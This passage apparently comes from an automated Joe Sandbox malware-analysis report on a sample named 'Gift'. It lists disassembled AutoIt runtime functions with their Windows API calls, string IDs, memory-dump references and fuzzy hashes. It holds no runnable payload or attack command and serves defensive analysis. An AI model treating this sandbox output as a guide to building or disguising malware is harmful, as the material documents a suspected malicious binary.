                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp
                                                                          • String ID: 0.0.0.0$L,6
                                                                          • API String ID: 856254489-1141617229
                                                                          • Opcode ID: 49a4e380384844c7fd98bd2936d793be14ab3ebe6f79dc1f67e7648893e7383b
                                                                          • Instruction ID: 3416783dc6acc070658ebcce4df06b59293d24b3d7f6a6a9d1905c3e568ec199
                                                                          • Opcode Fuzzy Hash: 49a4e380384844c7fd98bd2936d793be14ab3ebe6f79dc1f67e7648893e7383b
                                                                          • Instruction Fuzzy Hash: 4D1191356002149FCB05EF14D9C1EAAB3B9AF84714F11C499F94A6F3A5CA30ED46CBA0
                                                                          Function 00348475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 003486E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0034849D,?,00000000,?,?), ref: 003486F7
                                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003484A0
                                                                          • htons.WSOCK32(00000000,?,00000000), ref: 003484DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 2496851823-2422070025
                                                                          • Opcode ID: bf477f21705909a3793c5b75240c91eb38a2e4ebdd8d549b3f2d7e2ecb77a45b
                                                                          • Instruction ID: 0659982d09f3e5c498deb3b5f2177eec93498f99e5b0a8c04909d3a88933e781
                                                                          • Opcode Fuzzy Hash: bf477f21705909a3793c5b75240c91eb38a2e4ebdd8d549b3f2d7e2ecb77a45b
                                                                          • Instruction Fuzzy Hash: AD11A13520021AABDB15AF65DC46FBEB368FF04320F10856AFA159B391DB71B814CB95
                                                                          Function 003299BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00329A2B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 636d4e99a33840a0f5009150e2754aeb11c0f35179460534eddf472093cd3e2f
                                                                          • Instruction ID: 0c1752a6ec38a340abb4145fd3620a5de880d0382d9f6a4906dc954f71b72fb3
                                                                          • Opcode Fuzzy Hash: 636d4e99a33840a0f5009150e2754aeb11c0f35179460534eddf472093cd3e2f
                                                                          • Instruction Fuzzy Hash: 7601F571A91224AB8B15EBA4CC52DFEB369EF56320F50062AF871973C1DA305828CA60
                                                                          Function 002DBBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002DBC07
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • _wcscat.LIBCMT ref: 00313593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FullNamePath_memmove_wcscat
                                                                          • String ID: s9
                                                                          • API String ID: 257928180-3206952609
                                                                          • Opcode ID: c190ff2c8513a77c191c7836897ccad8e566533fc23f11ca39ad16bf9c9a7b8e
                                                                          • Instruction ID: e408cce7823d70329ff8df73501ccaa398c11d9fe2999d148636b5b48e8cf572
                                                                          • Opcode Fuzzy Hash: c190ff2c8513a77c191c7836897ccad8e566533fc23f11ca39ad16bf9c9a7b8e
                                                                          • Instruction Fuzzy Hash: 701182359342089BCB06EBA49892EDE77A8FF08350B1141A7B94997390DF709BA49B51
                                                                          Function 0033934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: 3b7e9138066ad51416cdab52d0b3a14feb0c3c7b837b0186bdbf87a167f6e596
                                                                          • Instruction ID: cf933b07ff78a088ee1af43d228a0bef966b6d5cff81ecc57c457274b124bb62
                                                                          • Opcode Fuzzy Hash: 3b7e9138066ad51416cdab52d0b3a14feb0c3c7b837b0186bdbf87a167f6e596
                                                                          • Instruction Fuzzy Hash: 4701F97280425CBEDB19C6A8CC56FFEBBFC9F01351F00429FF652D2181E5B5A6188B60
                                                                          Function 003298B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00329923
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 8307f1ac277200086771bd79bd53d5d5f31e2fd179d29b65db63d838abd606ee
                                                                          • Instruction ID: 13d3d8c692ba1f1d5374ddcbdd82bff59a4acded2300985c2ddcc4486221c5ea
                                                                          • Opcode Fuzzy Hash: 8307f1ac277200086771bd79bd53d5d5f31e2fd179d29b65db63d838abd606ee
                                                                          • Instruction Fuzzy Hash: 15012B71E911146BCB15FBA0D962FFFB3ACDF15300F50002AF851A3281DB205E28DAB2
                                                                          Function 0032993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003299A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: e8bbb48a255f86ecd028876982add9a2c745f25f9bda20c01a78a23e5fda2b7b
                                                                          • Instruction ID: a08e26b6e6fa0b57371c8a01a3144d1af859af92e733ea936a039b15b1b8c324
                                                                          • Opcode Fuzzy Hash: e8bbb48a255f86ecd028876982add9a2c745f25f9bda20c01a78a23e5fda2b7b
                                                                          • Instruction Fuzzy Hash: 5601DBB2A9111467DB16EBA4D952FFFB3AC9F11350F50002AB855A3281DB244E689672
                                                                          Function 002F6D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt
                                                                          • String ID: @b9
                                                                          • API String ID: 3494438863-2266355199
                                                                          • Opcode ID: bfd717402d1dc87dc642aff34ffe385f6efdf91fa07baef127a1c557709d84f6
                                                                          • Instruction ID: 81d82d09a29f083956329cf72a9878401b38c1f129895bef9ee878308de86ca3
                                                                          • Opcode Fuzzy Hash: bfd717402d1dc87dc642aff34ffe385f6efdf91fa07baef127a1c557709d84f6
                                                                          • Instruction Fuzzy Hash: E0F04F7233821B9BFB298F58BD456B1A799E7147A0F100977F344DA2D4E77188914A80
                                                                          Function 003354E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp
                                                                          • String ID: #32770
                                                                          • API String ID: 2292705959-463685578
                                                                          • Opcode ID: d242b318d0f9f3908c4c15f0e18cd022465a16804888f8f2e5ae3d44992a1990
                                                                          • Instruction ID: 10c7ec40761c04dac59e810cda6afed9872c80db95967632edade2900889f956
                                                                          • Opcode Fuzzy Hash: d242b318d0f9f3908c4c15f0e18cd022465a16804888f8f2e5ae3d44992a1990
                                                                          • Instruction Fuzzy Hash: 24E09B7250022D17D711A659AC45AA7F7ACDB56761F010057F904D6051D560E95587E0
                                                                          Function 00328892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003288A0
                                                                            • Part of subcall function 002F3588: _doexit.LIBCMT ref: 002F3592
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: 9ab273554be11fa18c57c5678339cfcbd471bc004f65c49fc44ad616c8e6a7c4
                                                                          • Instruction ID: ef3633935704568fd8f05b0181cc66d28a8d01374288976e4050677f9e2939db
                                                                          • Opcode Fuzzy Hash: 9ab273554be11fa18c57c5678339cfcbd471bc004f65c49fc44ad616c8e6a7c4
                                                                          • Instruction Fuzzy Hash: CDD05B3239535C36D21672A56C0BFDB7A4C8B05B91F40443AFB08651D38DD585B046D5
                                                                          Function 00310251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00310091
                                                                            • Part of subcall function 0034C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0031027A,?), ref: 0034C6E7
                                                                            • Part of subcall function 0034C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034C6F9
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00310289
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                          • String ID: WIN_XPe
                                                                          • API String ID: 582185067-3257408948
                                                                          • Opcode ID: 8833ea282882201ffb637917f5ca70dbf054259df1e1332e8baf46d16761fc53
                                                                          • Instruction ID: ef29721dba207c531393ce82621f12a5469fb2846ea72cb2acf7512d5f19cdf7
                                                                          • Opcode Fuzzy Hash: 8833ea282882201ffb637917f5ca70dbf054259df1e1332e8baf46d16761fc53
                                                                          • Instruction Fuzzy Hash: 32F01570815109DFCB1EDBA0C998BEDBABCAB0C300F245486E18AB6190CBB54EC4CF21
                                                                          Function 002E5800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyIcon.USER32(,z90z9,00397A2C,00397890,?,002E5A53,00397A2C,00397A30,?,00000004), ref: 002E5823
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyIcon
                                                                          • String ID: ,z90z9$SZ.,z90z9
                                                                          • API String ID: 1234817797-348785591
                                                                          • Opcode ID: 24244c9bd432ff4c480e88218e2822719b19737f2a8d814a950eae48dd2bb4cd
                                                                          • Instruction ID: 6ca25837b17493f7fc2edc94b584a15efa0c0652408ef51e2c1b59e5894a393d
                                                                          • Opcode Fuzzy Hash: 24244c9bd432ff4c480e88218e2822719b19737f2a8d814a950eae48dd2bb4cd
                                                                          • Instruction Fuzzy Hash: 0CE0C2320342A7EBE7214F0AD800795FBECAF21321FA48416E08046050D3F168F0CBA0